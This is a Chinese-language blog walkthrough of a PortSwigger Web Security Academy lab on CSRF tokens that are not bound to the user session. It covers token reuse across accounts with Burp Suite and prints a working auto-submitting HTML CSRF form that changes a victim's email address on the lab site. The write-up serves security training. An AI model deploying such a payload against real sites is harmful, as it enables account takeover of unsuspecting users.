Lab: CSRF where token is not tied to user session:CSRF,其中令牌与用户会话无关

本实验室的电子邮件更改功能易受 CSRF 攻击。它使用令牌来尝试防止 CSRF 攻击,但它们没有集成到站点的会话处理系统中。

要解决该实验,请使用您的漏洞利用服务器托管一个 HTML 页面,该页面使用CSRF 攻击来更改查看者的电子邮件地址。

您在应用程序上有两个帐户,可用于帮助设计攻击。凭据如下:

wiener:peter
carlos:montoya

CSRF 令牌不绑定到用户会话

某些应用程序不会验证令牌是否与发出请求的用户属于同一会话。相反,应用程序维护一个它已发行的全局令牌池,并接受出现在该池中的任何令牌。

在这种情况下,攻击者可以使用自己的帐户登录应用程序,获取有效的令牌,然后在 CSRF 攻击中将该令牌提供给受害用户。image
使用您的浏览器通过 Burp Suite 代理流量,登录您的帐户,提交“更新电子邮件”表单,并拦截由此产生的请求。
记下CSRF 令牌的值,然后删除请求。
打开一个私人/隐身浏览器窗口,登录到您的另一个帐户,然后将更新电子邮件请求发送到 Burp Repeater。image
请注意,如果您将 CSRF 令牌与其他帐户的值交换,则该请求将被接受。
把下面的代码放到服务器
代码内容:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://aca81f421ff8845b80496c0d005500d4.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="ExtArE&#64;qq&#46;com" />
      <input type="hidden" name="csrf" value="HxJzDofFGkr67rPbKYMun2ZqChlB0vw4" />
    </form>
<script>
      document.forms[0].submit();
</script>
  </body>
</html>

注意:csrf只能用一次,所以我们需要修改邮箱的时候阻断报文的传输
然后将其没用过的csrf复制到代码中

存储漏洞,然后单击“交付给受害者”以解决实验室问题。
所以这玩意是跨平台的:image

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值